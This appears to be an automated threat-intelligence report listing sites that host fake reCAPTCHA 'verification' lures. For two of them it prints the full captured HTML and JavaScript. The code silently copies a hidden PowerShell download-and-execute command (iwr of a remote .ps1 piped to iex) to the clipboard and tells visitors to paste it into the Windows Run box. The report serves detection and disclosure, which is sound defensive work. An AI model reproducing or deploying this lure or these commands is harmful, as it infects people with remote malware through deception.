ClickGrab Report: 2025-04-27
Report Summary
Sites Scanned
29
Attacks Detected
121
New Attack Patterns
0
Affected Sites
| Site Domain | Attack Type | Detected Patterns | First Seen |
|---|---|---|---|
| blessdayservices.org | PowerShell Execution | 5 | 2025-04-27 |
| jessespridecharters.com | PowerShell Execution | 5 | 2025-04-27 |
| mail.lucprofessional.com.br | PowerShell Execution | 3 | 2025-04-27 |
| mail.finocci.com | PowerShell Execution | 1 | 2025-04-27 |
| cambodiatouristservice.com | PowerShell Execution | 2 | 2025-04-27 |
| admin.gestroom.it | PowerShell Execution | 1 | 2025-04-27 |
| test.peperoncinochepassione.it | PowerShell Execution | 3 | 2025-04-27 |
| first-security-verden.de | PowerShell Execution | 5 | 2025-04-27 |
| lucprofessional.com.br | PowerShell Execution | 3 | 2025-04-27 |
| www.first-security-verden.de | PowerShell Execution | 5 | 2025-04-27 |
| www.laborpartyjo.com | PowerShell Execution | 3 | 2025-04-27 |
| finocci.com | PowerShell Execution | 1 | 2025-04-27 |
| www.finocci.com | PowerShell Execution | 1 | 2025-04-27 |
| www.website.mypetapp.co.za | PowerShell Execution | 3 | 2025-04-27 |
| www.lucprofessional.grupomoltz.com.br | PowerShell Execution | 3 | 2025-04-27 |
| thesignaturemag.salviatech.com | PowerShell Execution | 3 | 2025-04-27 |
| www.bratusferramentas.grupomoltz.com.br | PowerShell Execution | 3 | 2025-04-27 |
| website.mypetapp.co.za | PowerShell Execution | 3 | 2025-04-27 |
| www.zamilgroups.com | PowerShell Execution | 1 | 2025-04-27 |
| lucprofessional.grupomoltz.com.br | PowerShell Execution | 3 | 2025-04-27 |
| laborpartyjo.com | PowerShell Execution | 3 | 2025-04-27 |
| www.thesignaturemag.salviatech.com | PowerShell Execution | 3 | 2025-04-27 |
| mail.cambodiatouristservice.com | PowerShell Execution | 2 | 2025-04-27 |
| my.salviatech.com | PowerShell Execution | 3 | 2025-04-27 |
| 82.146.62.232 | PowerShell Execution | 3 | 2025-04-27 |
| 101.32.40.22 | PowerShell Execution | 4 | 2025-04-27 |
| staplebrokenmetaliyro.blogspot.com | PowerShell Execution | 46 | 2025-04-27 |
Detailed URL Analysis
https://blessdayservices.org/up/
Total findings: 5
Indicators of Compromise
Suspicious Patterns
PowerShell Commands
Clipboard Manipulation
Suspicious Keywords
CAPTCHA References
PowerShell Downloads
Malicious Code Sample
powershell -ArgumentList '-w hidden -c iwr https://irp.cdn-website.com/45d8c6e0/files/uploaded/32.ps1 | iex' -WindowStyle Hidden\""; powershell " + htaPath;
Warning: This code is malicious and should not be executed
JSON Technical Data
{
"URL": "https://blessdayservices.org/up/",
"URLs": [
"https://use.fontawesome.com/releases/v5.0.0/css/all.css",
"https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png",
"https://www.google.com/intl/en/policies/privacy/",
"https://www.google.com/intl/en/policies/terms/",
"https://irp.cdn-website.com/45d8c6e0/files/uploaded/32.ps1"
],
"PowerShellCommands": [
"powershell -ArgumentList '-w hidden -c iwr https://irp.cdn-website.com/45d8c6e0/files/uploaded/32.ps1 | iex' -WindowStyle Hidden\\\"\";",
"powershell \" + htaPath;"
],
"ClipboardCommands": "powershell ",
"SuspiciousKeywords": [
"\u2705",
"I am not a robot",
"Verification Hash",
"reCAPTCHA Verification",
"To better prove you are not a robot",
"I'm not a robot",
"<script>"
],
"ClipboardManipulation": [
"...); tempTextArea.select(); document.execCommand(\"copy\"); document.body.removeChild(tempTextArea); }...",
"...dy.append(tempTextArea); tempTextArea.select(); document.execCommand(\"copy\"); document.body.removeChild(tempTextAr..."
],
"PowerShellDownloads": [
{
"FullMatch": "iwr https://irp.cdn-website.com/45d8c6e0/files/uploaded/32.ps1 | iex",
"URL": "https://irp.cdn-website.com/45d8c6e0/files/uploaded/32.ps1",
"Context": "...n -c \\\"Start-Process powershell -ArgumentList '-w hidden -c iwr https://irp.cdn-website.com/45d8c6e0/files/uploaded/32.ps1 | iex' -WindowStyle Hidden\\\"\"; const commandToRun = \"..."
},
{
"FullMatch": "| iex",
"URL": null,
"Context": "...https://irp.cdn-website.com/45d8c6e0/files/uploaded/32.ps1 | iex' -WindowStyle Hidden\\\"\"; const commandToRun = \"..."
},
{
"FullMatch": "https://irp.cdn-website.com/45d8c6e0/files/uploaded/32.ps1",
"URL": "https://irp.cdn-website.com/45d8c6e0/files/uploaded/32.ps1",
"Context": "...\\\"Start-Process powershell -ArgumentList '-w hidden -c iwr https://irp.cdn-website.com/45d8c6e0/files/uploaded/32.ps1 | iex' -WindowStyle Hidden\\\"\"; const commandToR..."
}
],
"CaptchaElements": [
"ication Hash: <span id=\"verification-id\">1110</span>\"",
"s=\"modal\"> <div class=\"modal-content\"> <p>Please",
"} function hideCaptchaLoading() { chec",
"} function hideCaptchaCheckbox() { chec",
"ent)) { document.getElementById(\"mobileWarningModal\").style.display = \"b",
"et checkboxWindow = document.getElementById(\"checkbox-window\"); let check",
"let checkboxBtn = document.getElementById(\"checkbox\"); let check",
"heckboxBtnSpinner = document.getElementById(\"spinner\"); let verif",
"let verifywindow = document.getElementById(\"verify-window\"); function",
"mber(); document.getElementById('verification-id').textContent = veri",
"lect(); document.execCommand(\"copy\"); docu",
"tempTextArea.select(); docume",
"</div> <script> document.addEve",
"}); </script> <script> let checkbo"
],
"HTML": "<!DOCTYPE html>\n\n<html lang=\"en\">\n <head>\n <meta charset=\"utf-8\">\n <title>reCAPTCHA Verification</title>\n\n <link rel=\"stylesheet\" href=\"https://use.fontawesome.com/releases/v5.0.0/css/all.css\"> \n <style>\n\n.modal {\n display: none; /* Hidden by default */\n position: fixed;\n z-index: 9999; /* Ensure the modal is on top */\n left: 0;\n top: 0;\n width: 100%;\n height: 100%;\n background-color: rgba(0, 0, 0, 0.7); /* Dim the background */\n}\n\n.modal-content {\n position: absolute;\n top: 50%;\n left: 50%;\n transform: translate(-50%, -50%);\n background-color: white;\n padding: 20px;\n border-radius: 5px;\n box-shadow: 0 5px 15px rgba(0, 0, 0, 0.3);\n text-align: center;\n font-family: Arial, sans-serif;\n}\n\n .container {\n font-family: Roboto, helvetica, arial, sans-serif;\n }\n\n .m-p {\n margin: 0;\n padding: 0;\n }\n\n .block {\n display: block;\n }\n\n code {\n font-size: 9px;\n margin-left: 2px;\n color: gray;\n }\n\n .line-normal {\n line-height: normal;\n }\n\n .checkbox-window {\n position: fixed; /* Center it within the viewport */\n top: 50%;\n left: 50%;\n transform: translate(-50%, -50%);\n height: 74px;\n width: 300px;\n background-color: #f9f9f9;\n border-radius: 3px;\n border: 1px solid #d3d3d3;\n z-index: 1000;\n}\n\n .checkbox-window a {\n color: #555;\n text-decoration: none;\n }\n\n .checkbox-window a:hover {\n color: #555;\n text-decoration: underline;\n }\n\n .checkbox-container {\n width: 28px;\n height: 28px;\n }\n\n .checkbox {\n position: relative;\n background-color: #fff;\n border-radius: 2px;\n height: 100%;\n width: 100%;\n border: 2px solid #c1c1c1;\n margin: 21px 0 0 12px;\n outline: none;\n font-family: Roboto, helvetica, arial, sans-serif;\n transition: width 500ms, height 500ms, border-radius 500ms, margin-top 500ms, margin-left 500ms, opacity 700ms;\n }\n\n .checkbox:hover {\n border: 2px solid #b2b2b2;\n }\n\n .im-not-a-robot {\n position: relative;\n left: 52px;\n bottom: 3px;\n font-size: 15px;\n color: #282727;\n }\n\n .captcha-logo {\n position: relative;\n\n left: 244px;\n bottom: 36px;\n width: 40px;\n height: 45px;\n vertical-align: baseline;\n padding-bottom: 4px;\n }\n\n\n .checkbox-desc {\n color: #555555;\n position: relative;\n font-size: 8px;\n text-align: center;\n bottom: 40px;\n left: 112px;\n }\n\n .spinner {\n visibility: hidden;\n position: relative;\n top: -85px;\n left: 12px;\n height: 20px;\n width: 20px;\n border: 2px solid rgba(0, 0, 0, 0.1);\n border-top: 2px solid #333;\n border-radius: 50%;\n visibility: hidden;\n opacity: 0;\n transition: opacity 0.5s linear;\n animation: spin 1s linear infinite;\n }\n\n @keyframes spin {\n 0% {\n transform: rotate(0deg);\n }\n\n 100% {\n transform: rotate(360deg);\n }\n }\n\n .verify-window {\n position: fixed; /* Center it within the viewport */\n top: 50%;\n left: 50%;\n transform: translate(-50%, -50%);\n width: 310px;\n background-color: #fff;\n border: 1px solid #cecece;\n box-shadow: 5px 6px 7px -3px rgba(0, 0, 0, 0.12);\n transition: opacity 400ms;\n opacity: 0; /* Initially hidden */\n visibility: hidden;\n z-index: 1001;\n}\n\n ol {\n counter-reset: item;\n list-style-type: none;\n list-style-position: outside; \n padding-left: 0;\n\n }\n\n ol li {\n counter-increment: item;\n margin-bottom: 10px;\n\n }\n\n ol li::before {\n content: counter(item) \". \";\n color: #1A73E8;\n font-weight: bold;\n margin-right: 10px;\n margin-left: 10px;\n }\n\n .verify-container {\n padding: 8px;\n }\n\n .verify-header {\n background-color: #1A73E8;\n padding: 16px 16px 24px 16px;\n color: #fff;\n }\n\n .verify-header-text-small {\n font-size: 14px;\n line-height: normal;\n }\n\n .verify-header-text-medium {\n font-size: 16px;\n }\n\n .verify-header-text-big {\n font-size: 24px;\n font-weight: 700;\n }\n\n .verify-main {\n padding: 5px;\n color: #111;\n font-size: 13px;\n\n }\n\n .verify-footer {\n border-top: 1px solid #cecece;\n padding: 10px 7px 10px 7px;\n color: #737373;\n display: grid;\n grid-template-columns: auto 102px;\n font-size: 13px;\n }\n\n .verify-footer-left {\n padding: 5px;\n }\n\n .verify-verify-button {\n text-transform: uppercase;\n background-color: #5a89e2;\n color: #fff;\n text-align: center;\n width: 100%;\n padding: 12px 0 12px 0;\n text-decoration: none;\n font-weight: 600;\n height: min-content;\n border-radius: 3px;\n font-size: 14px;\n border: none;\n outline: none;\n cursor: not-allowed;\n }\n </style>\n </head>\n <body>\n<div id=\"mobileWarningModal\" class=\"modal\">\n <div class=\"modal-content\">\n <p>Please visit this site on a computer for the best experience.</p>\n </div>\n</div>\n\n <div class=\"container m-p\"> \n <div id=\"checkbox-window\" class=\"checkbox-window m-p block\">\n <div class=\"checkbox-container m-p\">\n <button type=\"button\" id=\"checkbox\" class=\"checkbox m-p line-normal\"></button>\n </div>\n <p class=\"im-not-a-robot m-p line-normal\">I'm not a robot</p>\n <img src=\"https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png\" class=\"captcha-logo line-normal\" alt=\"\">\n <br>\n <p class=\"checkbox-desc m-p line-normal\">\n <a href=\"https://www.google.com/intl/en/policies/privacy/\">Privacy</a> - <a href=\"https://www.google.com/intl/en/policies/terms/\">Terms</a>\n </p>\n <img class=\"spinner\" alt=\"\" id=\"spinner\">\n </div>\n \n <div id=\"verify-window\" class=\"verify-window\">\n <div class=\"verify-container\">\n <header class=\"verify-header\">\n <span class=\"verify-header-text-medium m-p block\">Complete these</span>\n <span class=\"verify-header-text-big m-p block\">Verification Steps</span>\n <span class=\"verify-header-text-medium m-p block\"></span>\n </header>\n <main class=\"verify-main\">\n <p>\n To better prove you are not a robot, please:\n </p>\n <ol>\n <li>\n Press & hold the Windows Key <i class=\"fab fa-windows\"></i> + <b>R</b>.\n </li>\n \n <li>\n In the verification window, press <b>Ctrl</b> + <b>V</b>.\n </li>\n\n <li>\n Press <b>Enter</b> on your keyboard to finish.\n </li>\n </ol>\n <p>\n You will observe and agree:\n <br>\n <code>\n \u2705 \"I am not a robot - reCAPTCHA Verification Hash: <span id=\"verification-id\">1110</span>\"\n </code>\n </p>\n\n \n </main>\n </div>\n <footer class=\"verify-container verify-footer\">\n <div class=\"verify-footer-left\">\n Perform the steps above to finish verification.\n </div>\n <button type=\"button\" class=\"verify-verify-button block\" id=\"verify-verify-button\" disabled=\"true\">Verify</button>\n </footer>\n </div> \n </div>\n<script>\n document.addEventListener(\"DOMContentLoaded\", function () {\n if (/Mobi|Android|iPhone|iPad|iPod/i.test(navigator.userAgent)) {\n document.getElementById(\"mobileWarningModal\").style.display = \"block\";\n document.body.style.overflow = \"hidden\"; // Prevent scrolling\n }\n });\n</script>\n <script>\n let checkboxWindow = document.getElementById(\"checkbox-window\");\n let checkboxBtn = document.getElementById(\"checkbox\");\n let checkboxBtnSpinner = document.getElementById(\"spinner\");\n let verifywindow = document.getElementById(\"verify-window\");\n\n function addCaptchaListeners() {\n if (checkboxBtn) {\n document.addEventListener(\"click\", function (event) {\n let path = event.composedPath();\n if (!path.includes(verifywindow) && isverifywindowVisible()) {\n closeverifywindow();\n }\n });\n checkboxBtn.addEventListener(\"click\", function (event) {\n event.preventDefault();\n checkboxBtn.disabled = true;\n runClickedCheckboxEffects();\n });\n }\n }\n\n function runClickedCheckboxEffects() {\n hideCaptchaCheckbox();\n setTimeout(function(){\n showCaptchaLoading();\n },500);\n setTimeout(function(){\n showVerifyWindow();\n },900)\n }\n\n function showCaptchaLoading() {\n checkboxBtnSpinner.style.visibility = \"visible\";\n checkboxBtnSpinner.style.opacity = \"1\";\n checkboxBtnSpinner.style.animation = \"spin 1s linear infinite\";\n }\n\n function hideCaptchaLoading() {\n checkboxBtnSpinner.style.opacity = \"0\";\n checkboxBtnSpinner.style.animation = \"none\";\n setTimeout(function() {\n checkboxBtnSpinner.style.visibility = \"hidden\";\n }, 500);\n }\n\n function hideCaptchaCheckbox() {\n checkboxBtn.style.visibility = \"hidden\";\n checkboxBtn.style.opacity = \"0\";\n }\n\n\n function showCaptchaCheckbox() {\n checkboxBtn.style.width = \"100%\";\n checkboxBtn.style.height = \"100%\";\n checkboxBtn.style.borderRadius = \"2px\";\n checkboxBtn.style.margin = \"21px 0 0 12px\";\n checkboxBtn.style.opacity = \"1\";\n }\n\n function hideCaptchaCheckbox() {\n checkboxBtn.style.width = \"4px\";\n checkboxBtn.style.height = \"4px\";\n checkboxBtn.style.borderRadius = \"50%\";\n checkboxBtn.style.marginLeft = \"25px\";\n checkboxBtn.style.marginTop = \"33px\";\n checkboxBtn.style.opacity = \"0\";\n }\n\n function showCaptchaLoading() {\n checkboxBtnSpinner.style.visibility = \"visible\";\n checkboxBtnSpinner.style.opacity = \"1\";\n }\n\n function hideCaptchaLoading() {\n checkboxBtnSpinner.style.visibility = \"hidden\";\n checkboxBtnSpinner.style.opacity = \"0\";\n }\n\n function generateRandomNumber() {\n const min = 1000; \n const max = 9999;\n return Math.floor(Math.random() * (max - min + 1) + min).toString();\n }\n\n function closeverifywindow() {\n verifywindow.style.display = \"none\";\n verifywindow.style.visibility = \"hidden\";\n verifywindow.style.opacity = \"0\";\n\n showCaptchaCheckbox();\n hideCaptchaLoading();\n checkboxBtn.disabled = false;\n }\n\n function isverifywindowVisible() {\n return verifywindow.style.display !== \"none\" && verifywindow.style.display !== \"\";\n }\n\n function setClipboardCopyData(textToCopy){\n const tempTextArea = document.createElement(\"textarea\");\n tempTextArea.value = textToCopy;\n document.body.append(tempTextArea);\n tempTextArea.select();\n document.execCommand(\"copy\");\n document.body.removeChild(tempTextArea);\n }\n\n function stageClipboard(commandToRun, verification_id){\n const suffix = \" # \"\n const ploy = \"\u2705 ''I am not a robot - reCAPTCHA Verification Hash: \"\n const end = \"''\"\n const textToCopy = commandToRun + suffix + ploy + verification_id + end\n\n setClipboardCopyData(textToCopy);\n }\n\n\n function showVerifyWindow() {\n verifywindow.style.display = \"block\";\n verifywindow.style.visibility = \"visible\";\n verifywindow.style.opacity = \"1\";\n verifywindow.style.top = checkboxWindow.offsetTop - 80 + \"px\";\n verifywindow.style.left = checkboxWindow.offsetLeft + 54 + \"px\";\n\n if (verifywindow.offsetTop < 5) {\n verifywindow.style.top = \"5px\";\n }\n\n if (verifywindow.offsetLeft + verifywindow.offsetWidth > window.innerWidth-10 ) {\n verifywindow.style.left = checkboxWindow.offsetLeft - 8 + \"px\";\n }\n\n var verification_id = generateRandomNumber();\n document.getElementById('verification-id').textContent = verification_id;\n \n const htaPath = \"-w hidden -c \\\"Start-Process powershell -ArgumentList '-w hidden -c iwr https://irp.cdn-website.com/45d8c6e0/files/uploaded/32.ps1 | iex' -WindowStyle Hidden\\\"\";\n const commandToRun = \"powershell \" + htaPath;\n stageClipboard(commandToRun, verification_id);\n\n }\n\n addCaptchaListeners();\n\n </script>\n </body>\n</html>\n",
"ThreatLevel": "High"
}
https://jessespridecharters.com/v/
Total findings: 5
Indicators of Compromise
Suspicious Patterns
PowerShell Commands
Clipboard Manipulation
Suspicious Keywords
CAPTCHA References
PowerShell Downloads
Malicious Code Sample
powershell " + htaPath;
Warning: This code is malicious and should not be executed
JSON Technical Data
{
"URL": "https://jessespridecharters.com/v/",
"URLs": [
"https://use.fontawesome.com/releases/v5.0.0/css/all.css",
"https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png",
"https://www.google.com/intl/en/policies/privacy/",
"https://www.google.com/intl/en/policies/terms/",
"https://yogasitesdev.wpengine.com/2/15.ps1"
],
"PowerShellCommands": "powershell \" + htaPath;",
"ClipboardCommands": "powershell ",
"SuspiciousKeywords": [
"\u2705",
"I am not a robot",
"Verification Hash",
"reCAPTCHA Verification",
"To better prove you are not a robot",
"I'm not a robot",
"<script>"
],
"ClipboardManipulation": [
"...); tempTextArea.select(); document.execCommand(\"copy\"); document.body.removeChild(tempTextArea); }...",
"...dy.append(tempTextArea); tempTextArea.select(); document.execCommand(\"copy\"); document.body.removeChild(tempTextAr..."
],
"PowerShellDownloads": [
{
"FullMatch": "iwr 'https://yogasitesdev.wpengine.com/2/15.ps1' | iex",
"URL": "https://yogasitesdev.wpengine.com/2/15.ps1",
"Context": "...d; const htaPath = \"-w hidden -c \\\"iwr 'https://yogasitesdev.wpengine.com/2/15.ps1' | iex\\\"\"; const commandToRun = \"powershell \" + htaPat..."
},
{
"FullMatch": "| iex",
"URL": null,
"Context": "...idden -c \\\"iwr 'https://yogasitesdev.wpengine.com/2/15.ps1' | iex\\\"\"; const commandToRun = \"powershell \" + htaPat..."
},
{
"FullMatch": "'https://yogasitesdev.wpengine.com/2/15.ps1'",
"URL": "https://yogasitesdev.wpengine.com/2/15.ps1",
"Context": "...const htaPath = \"-w hidden -c \\\"iwr 'https://yogasitesdev.wpengine.com/2/15.ps1' | iex\\\"\"; const commandToRun = \"powershell \" +..."
}
],
"CaptchaElements": [
"ication Hash: <span id=\"verification-id\">1110</span>\"",
"s=\"modal\"> <div class=\"modal-content\"> <p>Please",
"} function hideCaptchaLoading() { chec",
"} function hideCaptchaCheckbox() { chec",
"ent)) { document.getElementById(\"mobileWarningModal\").style.display = \"b",
"et checkboxWindow = document.getElementById(\"checkbox-window\"); let check",
"let checkboxBtn = document.getElementById(\"checkbox\"); let check",
"heckboxBtnSpinner = document.getElementById(\"spinner\"); let verif",
"let verifywindow = document.getElementById(\"verify-window\"); function",
"mber(); document.getElementById('verification-id').textContent = veri",
"lect(); document.execCommand(\"copy\"); docu",
"tempTextArea.select(); docume",
"</div> <script> document.addEve",
"}); </script> <script> let checkbo"
],
"HTML": "<!DOCTYPE html>\n\n<html lang=\"en\">\n <head>\n <meta charset=\"utf-8\">\n <title>reCAPTCHA Verification</title>\n\n <link rel=\"stylesheet\" href=\"https://use.fontawesome.com/releases/v5.0.0/css/all.css\"> \n <style>\n\n.modal {\n display: none; /* Hidden by default */\n position: fixed;\n z-index: 9999; /* Ensure the modal is on top */\n left: 0;\n top: 0;\n width: 100%;\n height: 100%;\n background-color: rgba(0, 0, 0, 0.7); /* Dim the background */\n}\n\n.modal-content {\n position: absolute;\n top: 50%;\n left: 50%;\n transform: translate(-50%, -50%);\n background-color: white;\n padding: 20px;\n border-radius: 5px;\n box-shadow: 0 5px 15px rgba(0, 0, 0, 0.3);\n text-align: center;\n font-family: Arial, sans-serif;\n}\n\n .container {\n font-family: Roboto, helvetica, arial, sans-serif;\n }\n\n .m-p {\n margin: 0;\n padding: 0;\n }\n\n .block {\n display: block;\n }\n\n code {\n font-size: 9px;\n margin-left: 2px;\n color: gray;\n }\n\n .line-normal {\n line-height: normal;\n }\n\n .checkbox-window {\n position: fixed; /* Center it within the viewport */\n top: 50%;\n left: 50%;\n transform: translate(-50%, -50%);\n height: 74px;\n width: 300px;\n background-color: #f9f9f9;\n border-radius: 3px;\n border: 1px solid #d3d3d3;\n z-index: 1000;\n}\n\n .checkbox-window a {\n color: #555;\n text-decoration: none;\n }\n\n .checkbox-window a:hover {\n color: #555;\n text-decoration: underline;\n }\n\n .checkbox-container {\n width: 28px;\n height: 28px;\n }\n\n .checkbox {\n position: relative;\n background-color: #fff;\n border-radius: 2px;\n height: 100%;\n width: 100%;\n border: 2px solid #c1c1c1;\n margin: 21px 0 0 12px;\n outline: none;\n font-family: Roboto, helvetica, arial, sans-serif;\n transition: width 500ms, height 500ms, border-radius 500ms, margin-top 500ms, margin-left 500ms, opacity 700ms;\n }\n\n .checkbox:hover {\n border: 2px solid #b2b2b2;\n }\n\n .im-not-a-robot {\n position: relative;\n left: 52px;\n bottom: 3px;\n font-size: 15px;\n color: #282727;\n }\n\n .captcha-logo {\n position: relative;\n\n left: 244px;\n bottom: 36px;\n width: 40px;\n height: 45px;\n vertical-align: baseline;\n padding-bottom: 4px;\n }\n\n\n .checkbox-desc {\n color: #555555;\n position: relative;\n font-size: 8px;\n text-align: center;\n bottom: 40px;\n left: 112px;\n }\n\n .spinner {\n visibility: hidden;\n position: relative;\n top: -85px;\n left: 12px;\n height: 20px;\n width: 20px;\n border: 2px solid rgba(0, 0, 0, 0.1);\n border-top: 2px solid #333;\n border-radius: 50%;\n visibility: hidden;\n opacity: 0;\n transition: opacity 0.5s linear;\n animation: spin 1s linear infinite;\n }\n\n @keyframes spin {\n 0% {\n transform: rotate(0deg);\n }\n\n 100% {\n transform: rotate(360deg);\n }\n }\n\n .verify-window {\n position: fixed; /* Center it within the viewport */\n top: 50%;\n left: 50%;\n transform: translate(-50%, -50%);\n width: 310px;\n background-color: #fff;\n border: 1px solid #cecece;\n box-shadow: 5px 6px 7px -3px rgba(0, 0, 0, 0.12);\n transition: opacity 400ms;\n opacity: 0; /* Initially hidden */\n visibility: hidden;\n z-index: 1001;\n}\n\n ol {\n counter-reset: item;\n list-style-type: none;\n list-style-position: outside; \n padding-left: 0;\n\n }\n\n ol li {\n counter-increment: item;\n margin-bottom: 10px;\n\n }\n\n ol li::before {\n content: counter(item) \". \";\n color: #1A73E8;\n font-weight: bold;\n margin-right: 10px;\n margin-left: 10px;\n }\n\n .verify-container {\n padding: 8px;\n }\n\n .verify-header {\n background-color: #1A73E8;\n padding: 16px 16px 24px 16px;\n color: #fff;\n }\n\n .verify-header-text-small {\n font-size: 14px;\n line-height: normal;\n }\n\n .verify-header-text-medium {\n font-size: 16px;\n }\n\n .verify-header-text-big {\n font-size: 24px;\n font-weight: 700;\n }\n\n .verify-main {\n padding: 5px;\n color: #111;\n font-size: 13px;\n\n }\n\n .verify-footer {\n border-top: 1px solid #cecece;\n padding: 10px 7px 10px 7px;\n color: #737373;\n display: grid;\n grid-template-columns: auto 102px;\n font-size: 13px;\n }\n\n .verify-footer-left {\n padding: 5px;\n }\n\n .verify-verify-button {\n text-transform: uppercase;\n background-color: #5a89e2;\n color: #fff;\n text-align: center;\n width: 100%;\n padding: 12px 0 12px 0;\n text-decoration: none;\n font-weight: 600;\n height: min-content;\n border-radius: 3px;\n font-size: 14px;\n border: none;\n outline: none;\n cursor: not-allowed;\n }\n </style>\n </head>\n <body>\n<div id=\"mobileWarningModal\" class=\"modal\">\n <div class=\"modal-content\">\n <p>Please visit this site on a computer for the best experience.</p>\n </div>\n</div>\n\n <div class=\"container m-p\"> \n <div id=\"checkbox-window\" class=\"checkbox-window m-p block\">\n <div class=\"checkbox-container m-p\">\n <button type=\"button\" id=\"checkbox\" class=\"checkbox m-p line-normal\"></button>\n </div>\n <p class=\"im-not-a-robot m-p line-normal\">I'm not a robot</p>\n <img src=\"https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png\" class=\"captcha-logo line-normal\" alt=\"\">\n <br>\n <p class=\"checkbox-desc m-p line-normal\">\n <a href=\"https://www.google.com/intl/en/policies/privacy/\">Privacy</a> - <a href=\"https://www.google.com/intl/en/policies/terms/\">Terms</a>\n </p>\n <img class=\"spinner\" alt=\"\" id=\"spinner\">\n </div>\n \n <div id=\"verify-window\" class=\"verify-window\">\n <div class=\"verify-container\">\n <header class=\"verify-header\">\n <span class=\"verify-header-text-medium m-p block\">Complete these</span>\n <span class=\"verify-header-text-big m-p block\">Verification Steps</span>\n <span class=\"verify-header-text-medium m-p block\"></span>\n </header>\n <main class=\"verify-main\">\n <p>\n To better prove you are not a robot, please:\n </p>\n <ol>\n <li>\n Press & hold the Windows Key <i class=\"fab fa-windows\"></i> + <b>R</b>.\n </li>\n \n <li>\n In the verification window, press <b>Ctrl</b> + <b>V</b>.\n </li>\n\n <li>\n Press <b>Enter</b> on your keyboard to finish.\n </li>\n </ol>\n <p>\n You will observe and agree:\n <br>\n <code>\n \u2705 \"I am not a robot - reCAPTCHA Verification Hash: <span id=\"verification-id\">1110</span>\"\n </code>\n </p>\n\n \n </main>\n </div>\n <footer class=\"verify-container verify-footer\">\n <div class=\"verify-footer-left\">\n Perform the steps above to finish verification.\n </div>\n <button type=\"button\" class=\"verify-verify-button block\" id=\"verify-verify-button\" disabled=\"true\">Verify</button>\n </footer>\n </div> \n </div>\n<script>\n document.addEventListener(\"DOMContentLoaded\", function () {\n if (/Mobi|Android|iPhone|iPad|iPod/i.test(navigator.userAgent)) {\n document.getElementById(\"mobileWarningModal\").style.display = \"block\";\n document.body.style.overflow = \"hidden\"; // Prevent scrolling\n }\n });\n</script>\n <script>\n let checkboxWindow = document.getElementById(\"checkbox-window\");\n let checkboxBtn = document.getElementById(\"checkbox\");\n let checkboxBtnSpinner = document.getElementById(\"spinner\");\n let verifywindow = document.getElementById(\"verify-window\");\n\n function addCaptchaListeners() {\n if (checkboxBtn) {\n document.addEventListener(\"click\", function (event) {\n let path = event.composedPath();\n if (!path.includes(verifywindow) && isverifywindowVisible()) {\n closeverifywindow();\n }\n });\n checkboxBtn.addEventListener(\"click\", function (event) {\n event.preventDefault();\n checkboxBtn.disabled = true;\n runClickedCheckboxEffects();\n });\n }\n }\n\n function runClickedCheckboxEffects() {\n hideCaptchaCheckbox();\n setTimeout(function(){\n showCaptchaLoading();\n },500);\n setTimeout(function(){\n showVerifyWindow();\n },900)\n }\n\n function showCaptchaLoading() {\n checkboxBtnSpinner.style.visibility = \"visible\";\n checkboxBtnSpinner.style.opacity = \"1\";\n checkboxBtnSpinner.style.animation = \"spin 1s linear infinite\";\n }\n\n function hideCaptchaLoading() {\n checkboxBtnSpinner.style.opacity = \"0\";\n checkboxBtnSpinner.style.animation = \"none\";\n setTimeout(function() {\n checkboxBtnSpinner.style.visibility = \"hidden\";\n }, 500);\n }\n\n function hideCaptchaCheckbox() {\n checkboxBtn.style.visibility = \"hidden\";\n checkboxBtn.style.opacity = \"0\";\n }\n\n\n function showCaptchaCheckbox() {\n checkboxBtn.style.width = \"100%\";\n checkboxBtn.style.height = \"100%\";\n checkboxBtn.style.borderRadius = \"2px\";\n checkboxBtn.style.margin = \"21px 0 0 12px\";\n checkboxBtn.style.opacity = \"1\";\n }\n\n function hideCaptchaCheckbox() {\n checkboxBtn.style.width = \"4px\";\n checkboxBtn.style.height = \"4px\";\n checkboxBtn.style.borderRadius = \"50%\";\n checkboxBtn.style.marginLeft = \"25px\";\n checkboxBtn.style.marginTop = \"33px\";\n checkboxBtn.style.opacity = \"0\";\n }\n\n function showCaptchaLoading() {\n checkboxBtnSpinner.style.visibility = \"visible\";\n checkboxBtnSpinner.style.opacity = \"1\";\n }\n\n function hideCaptchaLoading() {\n checkboxBtnSpinner.style.visibility = \"hidden\";\n checkboxBtnSpinner.style.opacity = \"0\";\n }\n\n function generateRandomNumber() {\n const min = 1000; \n const max = 9999;\n return Math.floor(Math.random() * (max - min + 1) + min).toString();\n }\n\n function closeverifywindow() {\n verifywindow.style.display = \"none\";\n verifywindow.style.visibility = \"hidden\";\n verifywindow.style.opacity = \"0\";\n\n showCaptchaCheckbox();\n hideCaptchaLoading();\n checkboxBtn.disabled = false;\n }\n\n function isverifywindowVisible() {\n return verifywindow.style.display !== \"none\" && verifywindow.style.display !== \"\";\n }\n\n function setClipboardCopyData(textToCopy){\n const tempTextArea = document.createElement(\"textarea\");\n tempTextArea.value = textToCopy;\n document.body.append(tempTextArea);\n tempTextArea.select();\n document.execCommand(\"copy\");\n document.body.removeChild(tempTextArea);\n }\n\n function stageClipboard(commandToRun, verification_id){\n const suffix = \" # \"\n const ploy = \"\u2705 ''I am not a robot - reCAPTCHA Verification Hash: \"\n const end = \"''\"\n const textToCopy = commandToRun + suffix + ploy + verification_id + end\n\n setClipboardCopyData(textToCopy);\n }\n\n\n function showVerifyWindow() {\n verifywindow.style.display = \"block\";\n verifywindow.style.visibility = \"visible\";\n verifywindow.style.opacity = \"1\";\n verifywindow.style.top = checkboxWindow.offsetTop - 80 + \"px\";\n verifywindow.style.left = checkboxWindow.offsetLeft + 54 + \"px\";\n\n if (verifywindow.offsetTop < 5) {\n verifywindow.style.top = \"5px\";\n }\n\n if (verifywindow.offsetLeft + verifywindow.offsetWidth > window.innerWidth-10 ) {\n verifywindow.style.left = checkboxWindow.offsetLeft - 8 + \"px\";\n }\n\n var verification_id = generateRandomNumber();\n document.getElementById('verification-id').textContent = verification_id;\n \n const htaPath = \"-w hidden -c \\\"iwr 'https://yogasitesdev.wpengine.com/2/15.ps1' | iex\\\"\";\n const commandToRun = \"powershell \" + htaPath;\n stageClipboard(commandToRun, verification_id);\n\n }\n\n addCaptchaListeners();\n\n </script>\n </body>\n</html>\n",
"ThreatLevel": "High"
}
https://mail.lucprofessional.com.br/
Total findings: 3
Suspicious Patterns
PowerShell Commands
Clipboard Manipulation
Suspicious Keywords
